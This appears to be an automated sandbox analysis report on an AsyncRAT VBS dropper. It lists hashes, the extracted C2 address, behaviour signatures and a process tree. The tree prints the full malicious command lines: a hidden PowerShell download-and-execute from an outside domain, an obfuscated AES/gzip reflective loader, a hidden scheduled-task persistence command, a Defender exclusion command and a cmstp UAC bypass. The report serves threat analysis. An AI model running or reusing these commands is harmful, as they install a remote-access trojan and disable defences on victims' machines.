Analysis
-
max time kernel
93s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-12-2024 18:13
Static task
static1
Behavioral task
behavioral1
Sample
6400_output.vbs
Resource
win7-20240903-en
General
-
Target
6400_output.vbs
-
Size
49KB
-
MD5
50e3a17992c509fd34daf21f3d408733
-
SHA1
99001c7b061914c9caaf7ef2ba75f25ac3498d82
-
SHA256
bb11c0b847be578c727bd146e232a82eb65b8c43ad1657b200e12416b5fb3e3b
-
SHA512
e21c89778aecaa7a532f5d953a87b6ed575a14788556b67b3311ffec188d492bd633773ee81879c1451cf6ed1ad4c189bf41f07fc8dbba72bd07103a53597849
-
SSDEEP
768:I+1zXj3HDb1sybJRpN9/NVAdEamHuaxBsgV29+DY9lYUP7bFQqrSwli:IIzTzL/vtNV/RHvM5ADeHFn0
Malware Config
Extracted
asyncrat
0.5.8
Default
38.255.42.40:1020
ZOmahQBSRciB
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/3768-206-0x00000000056C0000-0x00000000056D2000-memory.dmp family_asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 4 4000 powershell.exe 40 3768 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 1140 powershell.exe 4768 powershell.exe 448 powershell.exe 2288 powershell.exe 1088 powershell.exe 4000 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2160 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 1948 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 4000 powershell.exe 4000 powershell.exe 1140 powershell.exe 1140 powershell.exe 5052 powershell.exe 5052 powershell.exe 4768 powershell.exe 4768 powershell.exe 5032 powershell.exe 5032 powershell.exe 448 powershell.exe 448 powershell.exe 3768 powershell.exe 3768 powershell.exe 2288 powershell.exe 2288 powershell.exe 2864 powershell.exe 2864 powershell.exe 1088 powershell.exe 1088 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4000 powershell.exe Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 1948 taskkill.exe Token: SeDebugPrivilege 5052 powershell.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 5032 powershell.exe Token: SeIncreaseQuotaPrivilege 5032 powershell.exe Token: SeSecurityPrivilege 5032 powershell.exe Token: SeTakeOwnershipPrivilege 5032 powershell.exe Token: SeLoadDriverPrivilege 5032 powershell.exe Token: SeSystemProfilePrivilege 5032 powershell.exe Token: SeSystemtimePrivilege 5032 powershell.exe Token: SeProfSingleProcessPrivilege 5032 powershell.exe Token: SeIncBasePriorityPrivilege 5032 powershell.exe Token: SeCreatePagefilePrivilege 5032 powershell.exe Token: SeBackupPrivilege 5032 powershell.exe Token: SeRestorePrivilege 5032 powershell.exe Token: SeShutdownPrivilege 5032 powershell.exe Token: SeDebugPrivilege 5032 powershell.exe Token: SeSystemEnvironmentPrivilege 5032 powershell.exe Token: SeRemoteShutdownPrivilege 5032 powershell.exe Token: SeUndockPrivilege 5032 powershell.exe Token: SeManageVolumePrivilege 5032 powershell.exe Token: 33 5032 powershell.exe Token: 34 5032 powershell.exe Token: 35 5032 powershell.exe Token: 36 5032 powershell.exe Token: SeDebugPrivilege 448 powershell.exe Token: SeIncreaseQuotaPrivilege 448 powershell.exe Token: SeSecurityPrivilege 448 powershell.exe Token: SeTakeOwnershipPrivilege 448 powershell.exe Token: SeLoadDriverPrivilege 448 powershell.exe Token: SeSystemProfilePrivilege 448 powershell.exe Token: SeSystemtimePrivilege 448 powershell.exe Token: SeProfSingleProcessPrivilege 448 powershell.exe Token: SeIncBasePriorityPrivilege 448 powershell.exe Token: SeCreatePagefilePrivilege 448 powershell.exe Token: SeBackupPrivilege 448 powershell.exe Token: SeRestorePrivilege 448 powershell.exe Token: SeShutdownPrivilege 448 powershell.exe Token: SeDebugPrivilege 448 powershell.exe Token: SeSystemEnvironmentPrivilege 448 powershell.exe Token: SeRemoteShutdownPrivilege 448 powershell.exe Token: SeUndockPrivilege 448 powershell.exe Token: SeManageVolumePrivilege 448 powershell.exe Token: 33 448 powershell.exe Token: 34 448 powershell.exe Token: 35 448 powershell.exe Token: 36 448 powershell.exe Token: SeIncreaseQuotaPrivilege 448 powershell.exe Token: SeSecurityPrivilege 448 powershell.exe Token: SeTakeOwnershipPrivilege 448 powershell.exe Token: SeLoadDriverPrivilege 448 powershell.exe Token: SeSystemProfilePrivilege 448 powershell.exe Token: SeSystemtimePrivilege 448 powershell.exe Token: SeProfSingleProcessPrivilege 448 powershell.exe Token: SeIncBasePriorityPrivilege 448 powershell.exe Token: SeCreatePagefilePrivilege 448 powershell.exe Token: SeBackupPrivilege 448 powershell.exe Token: SeRestorePrivilege 448 powershell.exe Token: SeShutdownPrivilege 448 powershell.exe Token: SeDebugPrivilege 448 powershell.exe Token: SeSystemEnvironmentPrivilege 448 powershell.exe Token: SeRemoteShutdownPrivilege 448 powershell.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 1708 wrote to memory of 4000 1708 WScript.exe 83 PID 1708 wrote to memory of 4000 1708 WScript.exe 83 PID 4000 wrote to memory of 184 4000 powershell.exe 86 PID 4000 wrote to memory of 184 4000 powershell.exe 86 PID 184 wrote to memory of 2408 184 csc.exe 87 PID 184 wrote to memory of 2408 184 csc.exe 87 PID 4000 wrote to memory of 1848 4000 powershell.exe 88 PID 4000 wrote to memory of 1848 4000 powershell.exe 88 PID 1708 wrote to memory of 100 1708 WScript.exe 109 PID 1708 wrote to memory of 100 1708 WScript.exe 109 PID 100 wrote to memory of 3060 100 cmd.exe 111 PID 100 wrote to memory of 3060 100 cmd.exe 111 PID 3060 wrote to memory of 1820 3060 cmd.exe 113 PID 3060 wrote to memory of 1820 3060 cmd.exe 113 PID 3060 wrote to memory of 5052 3060 cmd.exe 114 PID 3060 wrote to memory of 5052 3060 cmd.exe 114 PID 3060 wrote to memory of 5052 3060 cmd.exe 114 PID 5052 wrote to memory of 4768 5052 powershell.exe 115 PID 5052 wrote to memory of 4768 5052 powershell.exe 115 PID 5052 wrote to memory of 4768 5052 powershell.exe 115 PID 5052 wrote to memory of 5032 5052 powershell.exe 116 PID 5052 wrote to memory of 5032 5052 powershell.exe 116 PID 5052 wrote to memory of 5032 5052 powershell.exe 116 PID 5052 wrote to memory of 448 5052 powershell.exe 120 PID 5052 wrote to memory of 448 5052 powershell.exe 120 PID 5052 wrote to memory of 448 5052 powershell.exe 120 PID 5052 wrote to memory of 3532 5052 powershell.exe 122 PID 5052 wrote to memory of 3532 5052 powershell.exe 122 PID 5052 wrote to memory of 3532 5052 powershell.exe 122 PID 3532 wrote to memory of 2704 3532 cmd.exe 124 PID 3532 wrote to memory of 2704 3532 cmd.exe 124 PID 3532 wrote to memory of 2704 3532 cmd.exe 124 PID 2704 wrote to memory of 4788 2704 cmd.exe 126 PID 2704 wrote to memory of 4788 2704 cmd.exe 126 PID 2704 wrote to memory of 4788 2704 cmd.exe 126 PID 2704 wrote to memory of 3768 2704 cmd.exe 127 PID 2704 wrote to memory of 3768 2704 cmd.exe 127 PID 2704 wrote to memory of 3768 2704 cmd.exe 127 PID 3768 wrote to memory of 2288 3768 powershell.exe 128 PID 3768 wrote to memory of 2288 3768 powershell.exe 128 PID 3768 wrote to memory of 2288 3768 powershell.exe 128 PID 3060 wrote to memory of 2160 3060 cmd.exe 129 PID 3060 wrote to memory of 2160 3060 cmd.exe 129 PID 3768 wrote to memory of 2864 3768 powershell.exe 130 PID 3768 wrote to memory of 2864 3768 powershell.exe 130 PID 3768 wrote to memory of 2864 3768 powershell.exe 130 PID 3768 wrote to memory of 1088 3768 powershell.exe 132 PID 3768 wrote to memory of 1088 3768 powershell.exe 132 PID 3768 wrote to memory of 1088 3768 powershell.exe 132
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6400_output.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dcn4bw3j\dcn4bw3j.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:184 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8F6F.tmp" "c:\Users\Admin\AppData\Local\Temp\dcn4bw3j\CSC47AACC5E28604F18B9B7C8DD7050679D.TMP"4⤵PID:2408
-
-
-
C:\windows\system32\cmstp.exe"C:\windows\system32\cmstp.exe" /au C:\windows\temp\tqtktrbf.inf3⤵PID:1848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$UlQe='CrSJrjeaSJrjteSJrjDSJrjecSJrjrypSJrjtSJrjorSJrj'.Replace('SJrj', ''),'FrduLGoduLGmBduLGasduLGe64duLGSduLGtduLGrduLGinduLGgduLG'.Replace('duLG', ''),'SplWEtyitWEty'.Replace('WEty', ''),'TrPLLOaPLLOnPLLOsfPLLOorPLLOmFPLLOinaPLLOlPLLOBloPLLOckPLLO'.Replace('PLLO', ''),'IqAvznvqAvzokqAvzeqAvz'.Replace('qAvz', ''),'ElCRJaeCRJamCRJaeCRJantCRJaAtCRJa'.Replace('CRJa', ''),'CopoKbTyToKbTooKbT'.Replace('oKbT', ''),'CNvoBhaNvoBnNvoBgNvoBeENvoBxNvoBteNvoBnsiNvoBonNvoB'.Replace('NvoB', ''),'DVBxQecoVBxQmVBxQprVBxQeVBxQssVBxQ'.Replace('VBxQ', ''),'GFWFdetFWFdCuFWFdrFWFdreFWFdntFWFdPFWFdrocFWFdessFWFd'.Replace('FWFd', ''),'MaJpEGinJpEGMoJpEGdJpEGuJpEGleJpEG'.Replace('JpEG', ''),'ReaMYpLdMYpLLiMYpLneMYpLsMYpL'.Replace('MYpL', ''),'LoHeytadHeyt'.Replace('Heyt', ''),'EntGbxPrGbxPyGbxPPGbxPoiGbxPntGbxP'.Replace('GbxP', '');powershell -w hidden;function qnnlg($BQRjz){$vhoqP=[System.Security.Cryptography.Aes]::Create();$vhoqP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vhoqP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vhoqP.Key=[System.Convert]::($UlQe[1])('PqF8xJ4DsUvA734I68CUFeZUlzBwmh524HQ2zwVtwU0=');$vhoqP.IV=[System.Convert]::($UlQe[1])('ZAXbNfl672AbdKJrN/GTPw==');$txLMz=$vhoqP.($UlQe[0])();$WcLWs=$txLMz.($UlQe[3])($BQRjz,0,$BQRjz.Length);$txLMz.Dispose();$vhoqP.Dispose();$WcLWs;}function cedax($BQRjz){$surik=New-Object System.IO.MemoryStream(,$BQRjz);$atgID=New-Object System.IO.MemoryStream;$stzGr=New-Object System.IO.Compression.GZipStream($surik,[IO.Compression.CompressionMode]::($UlQe[8]));$stzGr.($UlQe[6])($atgID);$stzGr.Dispose();$surik.Dispose();$atgID.Dispose();$atgID.ToArray();}$UdUcO=[System.IO.File]::($UlQe[11])([Console]::Title);$lgana=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 5).Substring(2))));$RDaZu=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 6).Substring(2))));[System.Reflection.Assembly]::($UlQe[12])([byte[]]$RDaZu).($UlQe[13]).($UlQe[4])($null,$null);[System.Reflection.Assembly]::($UlQe[12])([byte[]]$lgana).($UlQe[13]).($UlQe[4])($null,$null); "4⤵PID:1820
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\n1')5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 90481' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network90481Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network90481Man.cmd"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network90481Man.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network90481Man.cmd';$UlQe='CrSJrjeaSJrjteSJrjDSJrjecSJrjrypSJrjtSJrjorSJrj'.Replace('SJrj', ''),'FrduLGoduLGmBduLGasduLGe64duLGSduLGtduLGrduLGinduLGgduLG'.Replace('duLG', ''),'SplWEtyitWEty'.Replace('WEty', ''),'TrPLLOaPLLOnPLLOsfPLLOorPLLOmFPLLOinaPLLOlPLLOBloPLLOckPLLO'.Replace('PLLO', ''),'IqAvznvqAvzokqAvzeqAvz'.Replace('qAvz', ''),'ElCRJaeCRJamCRJaeCRJantCRJaAtCRJa'.Replace('CRJa', ''),'CopoKbTyToKbTooKbT'.Replace('oKbT', ''),'CNvoBhaNvoBnNvoBgNvoBeENvoBxNvoBteNvoBnsiNvoBonNvoB'.Replace('NvoB', ''),'DVBxQecoVBxQmVBxQprVBxQeVBxQssVBxQ'.Replace('VBxQ', ''),'GFWFdetFWFdCuFWFdrFWFdreFWFdntFWFdPFWFdrocFWFdessFWFd'.Replace('FWFd', ''),'MaJpEGinJpEGMoJpEGdJpEGuJpEGleJpEG'.Replace('JpEG', ''),'ReaMYpLdMYpLLiMYpLneMYpLsMYpL'.Replace('MYpL', ''),'LoHeytadHeyt'.Replace('Heyt', ''),'EntGbxPrGbxPyGbxPPGbxPoiGbxPntGbxP'.Replace('GbxP', '');powershell -w hidden;function qnnlg($BQRjz){$vhoqP=[System.Security.Cryptography.Aes]::Create();$vhoqP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vhoqP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vhoqP.Key=[System.Convert]::($UlQe[1])('PqF8xJ4DsUvA734I68CUFeZUlzBwmh524HQ2zwVtwU0=');$vhoqP.IV=[System.Convert]::($UlQe[1])('ZAXbNfl672AbdKJrN/GTPw==');$txLMz=$vhoqP.($UlQe[0])();$WcLWs=$txLMz.($UlQe[3])($BQRjz,0,$BQRjz.Length);$txLMz.Dispose();$vhoqP.Dispose();$WcLWs;}function cedax($BQRjz){$surik=New-Object System.IO.MemoryStream(,$BQRjz);$atgID=New-Object System.IO.MemoryStream;$stzGr=New-Object System.IO.Compression.GZipStream($surik,[IO.Compression.CompressionMode]::($UlQe[8]));$stzGr.($UlQe[6])($atgID);$stzGr.Dispose();$surik.Dispose();$atgID.Dispose();$atgID.ToArray();}$UdUcO=[System.IO.File]::($UlQe[11])([Console]::Title);$lgana=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 5).Substring(2))));$RDaZu=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 6).Substring(2))));[System.Reflection.Assembly]::($UlQe[12])([byte[]]$RDaZu).($UlQe[13]).($UlQe[4])($null,$null);[System.Reflection.Assembly]::($UlQe[12])([byte[]]$lgana).($UlQe[13]).($UlQe[4])($null,$null); "7⤵
- System Location Discovery: System Language Discovery
PID:4788
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe7⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2288
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network90481Man')8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2864
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 90481' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network90481Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1088
-
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /nobreak /t 14⤵
- Delays execution with timeout.exe
PID:2160
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1948
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5928d36ad618a369ffebf44885d07cf81
SHA1edf5a353a919c1873af8e6a0dfafa4c38c626975
SHA256d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea
SHA5124ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a
-
Filesize
21KB
MD5b6922c772cf0d207cc6c36cfcf49e1e5
SHA1a61cdcc142c0152ae9657def5220a0f05554d62e
SHA2565e1e0c4736cf9ca7f80a6cb954f6a011f3e5ba8d8b686f74576e359bee985db4
SHA5128ba98376422cb3e0004eed6bb56698c1fde1b3fe2fb28848228d4b57167906e99886252ec5937d3b3417f98dffae1f2ce05aad25445b947703312a02fb62e1d4
-
Filesize
20KB
MD5df64a0f91488ae0586c0aa6ed9fa37ef
SHA1fa1bf8acebf149171289d857ba5d8dce42428ea0
SHA2561cb349c875ef217eb9990e47759e830506f81eafbb2095e9f5598e826c89ba5f
SHA512652a3b2ddc6bfc480de9d532f86674c33114948644fcc8af81d95b294fb794adeba219773490676c1988b4773de6373fe71e9c4e687d0e37a74f11f8f9a391d0
-
Filesize
21KB
MD5885ac1392da9005714c2dd1fda159501
SHA19e1acc57642174f248cbbf2737bbef5f233df1c0
SHA2569121d639ff72aad17d8ab9447d9759ec9eac5ed060a1a0f650fcfe5948fee60b
SHA512bcb9e185113097810f5ab4516db23dd2aa74e3b54545f9e84bb25f3fdd1500d625b1471288c265a8b8f8a29a98fb17ce1681937141fffe7bc35942c4836aeecf
-
Filesize
20KB
MD5068f47c4f4e017c7581b66aeb5b628e2
SHA1ba6335376bddd526082d773be8461e8cfc241d42
SHA2561068ccaf69950254c08ae49e32c3c6a76c132e867510cadebc725d3bd30e0b7d
SHA512cd85b0e60977dba2a1c8dcf468f824dff53563edff5ea05bcdf65fe471b79e42084fc0377f175af146153fb56ff1997eda317d9bccb32e89651e804d2db9e3da
-
Filesize
1KB
MD574d1002cda3a8f9a938b9dccb9a746b9
SHA1ac8674cc788f31667cbcb9d87f824b59dca1f9eb
SHA256691eef89596f30812d6e804b0301a33576e8e8e57f618e9e1200ba9ed87a7e43
SHA512101127e270a542d1308d93559ec98ea28954cd76fd7bd0332f512424dae1e5e9807d24544bf2247760d33902bf0fdb784ff8479d21b45db542e624b47dfedad6
-
Filesize
1KB
MD5e0f562601818e1f11c8d23d95d87313b
SHA1d08090b7953917ae92d518295d240526945b89de
SHA25629f298b74077397313959e1ec8deab9b1ffa9fa9d55fff1f7a110ca4e3d92d8c
SHA5124e336a4f45a271f8dc6a2f8d3ed4140c9afd5f87ce3d60b359c3789897c6824f60dd8dd225d39b88a5aaa864ae2f5de85321f666109e99a3d879b56545a92227
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD553a5682d4144c175e39efe7210d18c4a
SHA1cb2f37cd224f866b262cc1f799e620910d7a3328
SHA256089157fb4aa26ed5c9a3558d13d656bc754bb04c193556a39f419b9115c6e976
SHA5129d9b456b2a091da45f3dfcaabe03b2d145365ab086f6e4bfc8f39df0a2eeff5e5cf8ddeced37efd9dd2764624e92346a7f237aa7fc0977ba6f83d6d9db4393a2
-
Filesize
48KB
MD583fba8b8c150fdd949067fc54f597aa1
SHA1fc6e442dba604453db6988950a09cd539c5f2ec8
SHA2567f5beae0e19c0836c3f6838dacbebab8a8811643156f1af13664ff4725989f25
SHA51211c852bb8d36a9e42beb5d42b3120bcec309ff751e60f750b8d35383b546285fd999450a13c238074228b8170d6efd16f238ec2c583964ee8393df23a201c1dd
-
Filesize
675B
MD50a85805c6649ad8e6f40c9ddc1258a49
SHA169ca8a686c49218281a09bbed22ef55654a04459
SHA256f20428b0f70a5fa861f27eef9583b473217ee467ef39f475d337f073851436be
SHA51216775646f1df49f479e967c885e9948c52fcd31abc2041c63a50fd32e1380d3d963612d02f2db62e39c3bdcc959eb2d56f40d9f0f82a36897c8340206e355fad
-
Filesize
652B
MD56e408aec2958c3cfabad33d244f06bff
SHA1c17eb3ba934b833f2e7f9daedc12cc0f6f19aa03
SHA256b265e2dec95506e7ce9223d2b758b9d58c21aed89c288c7e45c0cb59feb3b176
SHA512a0df25c222e86b8d7f2849fe906f9f244874524ca2e580a23689a873c8439792f42800207d6cc95453706c083a46b133ab491160cf09ce5c6d1664a8ddf4c315
-
Filesize
2KB
MD5b8f676e5e58a88c030c8437cf8c44510
SHA1d2a94f790a3f41e2e207b6875c3215ad6788d902
SHA2564580f48e57bafd774e5e2f48b8a7c67541f6cffd366fe702d1d414ca74abe1ab
SHA51266af99543b3d818bcc700e32686067c8483135f94492f3e6f5a58c8d55ef6f4488052a9311d37fc822284f41b0eec0edfcf12beba4b91b62d42acc3578220b7e
-
Filesize
369B
MD5f01ff7ca80b4ed2f6ca625e0129d1f7c
SHA1dbaf95581ede4e0891441a0bc6941975bfe9cf9b
SHA25643a0558740d6015006eb9002d2b5982b7d53950e8a857c1ad90ea914485b1b41
SHA512ba467613eaac9f4e13b44bba645136c9084b36bb548a81cb16fc540cae310fc195f64b1767a7a737b17fcd1d87d448d471880646662a2c1125f1a421c7cf9b96